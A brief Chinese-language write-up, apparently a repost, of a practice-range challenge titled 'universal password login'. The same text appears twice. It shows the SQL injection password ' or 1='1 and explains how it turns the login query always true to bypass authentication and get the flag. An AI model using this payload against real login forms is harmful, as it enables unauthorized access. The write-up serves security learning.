题目很明显的标注,万能密码登陆
用户名随便输
密码: ' or 1 ='1
登陆拿到flag
select name,pass from tbAdmin where name='admin' and pass='123456'
输入密码: ' or 1='1
sql语句就变成下面这个样子:
select name,pass from tbAdmin where name='admin' and pass='' or 1='1'
1='1'永远为真,所以登陆成功
题目很明显的标注,万能密码登陆
用户名随便输
密码: ' or 1 ='1
登陆拿到flag
select name,pass from tbAdmin where name='admin' and pass='123456'
输入密码: ' or 1='1
sql语句就变成下面这个样子:
select name,pass from tbAdmin where name='admin' and pass='' or 1='1'
1='1'永远为真,所以登陆成功
本文标题:ibug靶场(万能密码登陆)
本文链接:https://www.haomeiwen.com/subject/wycneqtx.html
网友评论